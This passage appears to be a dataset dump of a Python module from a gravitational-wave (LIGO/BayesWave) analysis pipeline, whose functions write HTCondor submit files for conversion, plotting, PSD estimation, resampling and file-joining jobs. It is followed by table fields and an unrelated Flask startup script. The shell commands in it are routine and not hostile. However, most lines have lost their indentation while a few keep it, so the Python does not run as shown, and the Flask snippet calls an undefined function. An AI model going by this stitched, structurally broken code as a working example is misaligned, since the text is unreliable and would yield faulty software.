        f.write(exe + " " + base_str + "*.composite \n")
st = os.stat(cmdname)
import stat
os.chmod(cmdname, st.st_mode | stat.S_IEXEC)
ile_job = pipeline.CondorDAGJob(universe=universe, executable=base_str+cmdname) # force full prefix
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
# ile_job.add_arg('*.composite') # what to do
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convert_sub(tag='convert', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'convert' job
convert_output_format_ile2inference
"""
exe = exe or which("convert_output_format_ile2inference") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_arg(file_input)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_test_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,universe="target",arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a convergence test job
"""
exe = exe or which("convergence_test_samples.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("samples " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_plot_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a final plot. Note the user can in principle specify several samples (e.g., several iterations, if we want to diagnose them)
"""
exe = exe or which("plot_posterior_corner.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("posterior-file " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_init_sub(tag='gridinit', exe=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a grid initialization job.
Note this routine MUST create whatever files are needed by the ILE iteration
"""
exe = exe or which("util_ManualOverlapGrid.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_monoblock(tag='PSD_BW_mono', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,universe='local',no_grid=False,**kwargs):
"""
Write a submit file for constructing the PSD using BW
Modern argument syntax for BW
    Note that all IFO-specific settings must be constructed outside this routine and passed in via the argument string.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BW
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Loop over IFOs
# You should only have one, in the workflow for which this is intended
# Problem:
ile_job.add_arg("$(macroargument0)")
#
# Add mandatory options
ile_job.add_opt('Niter', '1000100')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Dmax', '200') # limit number of dimensions in model
ile_job.add_opt('resume', '')
ile_job.add_opt('progress', '')
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('psdlength', str(psd_length))
ile_job.add_opt('srate', str(srate))
ile_job.add_opt('outputDir', 'output_$(ifo)')
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step1(tag='PSD_BW_post', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
    Write a submit file for launching BayesWavePost jobs to produce PSD estimates from the BayesWave output.
    Inputs:
        - channel_dict['H1'] = [channel_name, flow_ifo]
    Outputs:
        - An instance of the CondorDAGJob that was generated for BayesWavePost
"""
exe = exe or which("BayesWavePost")
if exe is None:
print(" BayesWavePost not available, hard fail ")
import sys
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
# Not needed, can do one job per PSD
# ile_job.add_opt("ifo","$(ifo)")
# ile_job.add_opt("$(ifo)-cache",cache_file)
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo "+ ifo) # need to prevent overwriting!
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
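# Illustrative (assumed) shape of the channel_dict argument consumed by the BayesWave
# submit writers; channel names and values below are examples only:
#   channel_dict = {
#       'H1': ['GDS-CALIB_STRAIN', 20],   # [channel_name, flow_ifo]
#       'L1': ['GDS-CALIB_STRAIN', 20],
#   }
#   psd_job, psd_sub = write_psd_sub_BW_step1(tag='PSD_BW_post', log_dir='logs/',
#                                             channel_dict=channel_dict, cache_file='local.cache',
#                                             event_time=1126259462.4, psd_length=4, srate=4096)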
def write_psd_sub_BW_step0(tag='PSD_BW', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
    Write a submit file for launching BayesWave jobs to estimate the PSD.
    Inputs:
        - channel_dict['H1'] = [channel_name, flow_ifo]
    Outputs:
        - An instance of the CondorDAGJob that was generated for BayesWave
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo " + ifo)
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
ile_job.add_opt(ifo+"-timeslide", str(0.0))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_resample_sub(tag='resample', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("util_ResampleILEOutputWithExtrinsic.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt('fname',file_input)
ile_job.add_opt('fname-out',file_output)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_cat_sub(tag='cat', exe=None, file_prefix=None,file_postfix=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
    Write a submit file for launching a 'cat' job: concatenate the per-worker output files
    matching file_prefix*file_postfix into a single sorted, de-duplicated output file.
"""
exe = exe or which("find") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
exe_switch = which("switcheroo") # tool for patterend search-replace, to fix first line of output file
cmdname = 'catjob.sh'
with open(cmdname,'w') as f:
f.write("#! /bin/bash\n")
f.write(exe+" . -name '"+file_prefix+"*"+file_postfix+"' -exec cat {} \; | sort -r | uniq > "+file_output+";\n")
f.write(exe_switch + " 'm1 ' '# m1 ' "+file_output) # add standard prefix
os.system("chmod a+x "+cmdname)
ile_job = pipeline.CondorDAGJob(universe=universe, executable='catjob.sh')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# ile_job.add_arg(" . -name '" + file_prefix + "*" +file_postfix+"' -exec cat {} \; ")
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convertpsd_sub(tag='convert_psd', exe=None, ifo=None,file_input=None,target_dir=None,arg_str='',log_dir=None, universe='local',**kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("convert_psd_ascii2xml") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_opt("fname-psd-ascii",file_input)
ile_job.add_opt("ifo",ifo)
ile_job.add_arg("--conventional-postfix")
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if not (target_dir is None):
# Copy output PSD into place
ile_job.add_condor_cmd("+PostCmd", '" cp '+ifo+'-psd.xml.gz ' + target_dir +'"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_joingrids_sub(tag='join_grids', exe=None, universe='vanilla', input_pattern=None,target_dir=None,output_base=None,log_dir=None,n_explode=1, gzip="/usr/bin/gzip", old_add=True, **kwargs):
"""
    Write a submit file for joining the per-worker ('exploded') grid files into a single XML grid using ligolw_add.
"""
exe = exe or which("ligolw_add") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# exe_here = "my_join.sh"
# with open(exe_here,'w') as f:
# f.write("#! /bin/bash \n")
# f.write(r"""
# #!/bin/bash
# # Modules and scripts run directly from repository
# # Note the repo and branch are self-referential ! Not a robust solution long-term
# # Exit on failure:
# # set -e
# {} {} > {}/{}.xml
# gzip {}.{}.xml""".format(exe,input_pattern,target_dir,output_base,target_dir,output_base) )
# os.system("chmod a+x "+exe_here)
# exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
fname_out =target_dir + "/" +output_base + ".xml.gz"
ile_job.add_arg("--output="+fname_out)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
explode_str = ""
for indx in np.arange(n_explode):
explode_str+= " {}/{}-{}.xml.gz ".format(working_dir,output_base,indx)
explode_str += " {}/{}.xml.gz ".format(working_dir,output_base)
ile_job.add_arg(explode_str)
# ile_job.add_arg("overlap-grid*.xml.gz") # working in our current directory
if old_add:
ile_job.add_opt("ilwdchar-compat",'') # needed?
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_subdagILE_sub(tag='subdag_ile', exe=None, universe='vanilla', submit_file=None,input_pattern=None,target_dir=None,output_suffix=None,log_dir=None,sim_xml=None, **kwargs):
"""
    Write a submit file for a job that builds the ILE sub-DAG for one iteration (create_ile_sub_dag.py).
"""
exe = exe or which("create_ile_sub_dag.py")
subfile = submit_file or 'ILE.sub'
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_arg("--target-dir "+target_dir)
ile_job.add_arg("--output-suffix "+output_suffix)
ile_job.add_arg("--submit-script "+subfile)
ile_job.add_arg("--macroiteration $(macroiteration)")
ile_job.add_arg("--sim-xml "+sim_xml)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to " + ile_sub_name + " !")
return ile_job, ile_sub_name
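# Illustrative note (not in the original module): the $(macroiteration) argument in the
# .sub above is typically bound per DAG node via a VARS macro, e.g. with glue.pipeline:
#   node = pipeline.CondorDAGNode(ile_job)
#   node.add_macro("macroiteration", 0)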
| 0
| 0
| 0
| 0
| 0
| 423
| 0
| 0
| 68
|
175a3b4d2739554618c982905727d9731a509a3f
| 934
|
py
|
Python
|
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from flask import Flask
import mysql
from mysql import Pool
import properties
# Define the WEB application container (and keep JSON responses from being ASCII-escaped)
app=Flask(__name__)
app.config['JSON_AS_ASCII'] = False
# Handle auto-injection across the modules and assemble the blueprints.
# dir_path is the blueprint module path; e.g. if the blueprints live in the routes folder, pass '/routes'.
print('Loading database module')
mysql.pool = Pool.Pool()
# print('Loading finished')
print('Initializing blueprints')
for path in properties.blueprint_path:
map_apps(path)
| 22.780488
| 96
| 0.639186
|
